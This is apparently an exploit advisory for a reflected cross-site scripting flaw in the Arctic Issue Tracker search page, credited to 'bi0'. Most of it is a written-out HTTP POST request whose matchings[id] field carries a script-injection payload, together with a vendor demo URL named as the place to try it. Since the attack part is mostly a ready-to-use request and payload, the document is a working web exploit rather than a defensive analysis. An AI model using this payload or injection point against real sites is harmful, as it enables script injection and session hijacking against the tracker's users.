______     __     ______             
               /\  == \   /\ \   /\  __ \   
               \ \  __<   \ \ \  \ \ \/\ \  
                \ \_____\  \ \_\  \ \_____\ 
                 \/_____/   \/_/   \/_____/ 
				 
                 01000010 01101001 01001111      

[#]----------------------------------------------------------------[#]
# 
# [+] Arctic Issue Tracker [XSS]
#
#  // Author Info 
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com	
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath and ssteam.ws
#
#   // Software Info 
# [x] Name : Arctic Issue Tracker
# [x] Vendor : http://www.arctictracker.com/
# [x] Price : 99.95 USD
#
[#]-------------------------------------------------------------------------------------------[#]

 [x] Exploit : 

  [ Request Header ]
  
 Host: demo.arcticissuetracker.com
 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Keep-Alive: 300
 Connection: keep-alive
 Referer: http://demo.arcticissuetracker.com/index.php?cmd=search
 Cookie: PHPSESSID=9ec5cf089a9467bdc48cb36f9e83885e
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 57
 
  [ Post Content ]
  
 submit=Login&matchings%5Bid%5D="/><script>alert(/XSS/)</script>&matchings%5Btitle%5D=xss-attack@demo.com

 [ OR ] simple .. 
 
 http://localhost/index.php?cmd=search
 
 and type at "ID:" XSS code ..
 
[#]------------------------------------------------------------------------------------------[#]
#
#  Demo : 
# 
#  [+] http://demo.arcticissuetracker.com/index.php?cmd=search
#  
#  
[#]-------------------------------------------------------------------------------------------[#]

#EOF